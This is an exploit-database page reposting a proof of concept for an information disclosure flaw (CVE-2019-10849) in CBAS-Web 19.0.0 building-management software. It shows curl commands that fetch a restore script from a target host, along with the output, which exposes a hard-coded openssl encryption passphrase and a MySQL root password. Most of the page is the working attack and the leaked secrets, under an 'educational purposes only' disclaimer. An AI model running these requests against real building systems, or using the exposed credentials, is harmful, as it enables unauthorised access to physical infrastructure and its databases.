Cbasweb 19.0.0 information disclosure Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2019-11-12 | Type : remote | Platform : hardware
This exploit / vulnerability Cbasweb 19.0.0 information disclosure is for educational purposes only and if it is used you will do on your own risk!

[+] Code ...

# Exploit Title: CBAS-Web 19.0.0 - Information Disclosure
# Google Dork: NA
# Date: 2019-11-11
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.computrols.com/capabilities-cbas-web/
# Software Link: https://www.computrols.com/building-automation-software/
# Version: 19.0.0
# Tested on: NA
# CVE : CVE-2019-10849
# Advisory: https://applied-risk.com/resources/ar-2019-009
# Paper: https://applied-risk.com/resources/i-own-your-building-management-system

$ curl -s http://192.168.1.250/cbas/scripts/upgrade/restore_sql_db.sh | grep openssl
openssl enc -d -bf -pass pass:"WebAppEncoding7703" -in $FILE -out $filename.sql.gz

$ curl -s http://192.168.1.250/cbas/scripts/upgrade/restore_sql_db.sh | grep "\-\-password"
#for i in `mysql -B -u root --password="souper secrit" -e "show tables" wadb`; do
# mysql -u root --password="souper secrit" -e "describe $i" wadb;
mysql -u root --password="souper secrit" $DB < $filename.sql
$MYSQL -u root --password="souper secrit" -e "$SQL"

Cbasweb 19.0.0 information disclosure


Last added Exploits Vulnerabilities

▸ soplanning 1.52.01 (simple online planning tool) - remote code execution (rce) (authenticated) ◂
Discovered: 2024-11-15
Type: webapps
Platform: php
▸ rengine 2.2.0 - command injection (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: multiple
▸ opensis 9.1 - sqli (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: php



Tags:
Cbasweb 19.0.0 information disclosure Vulnerability / Exploit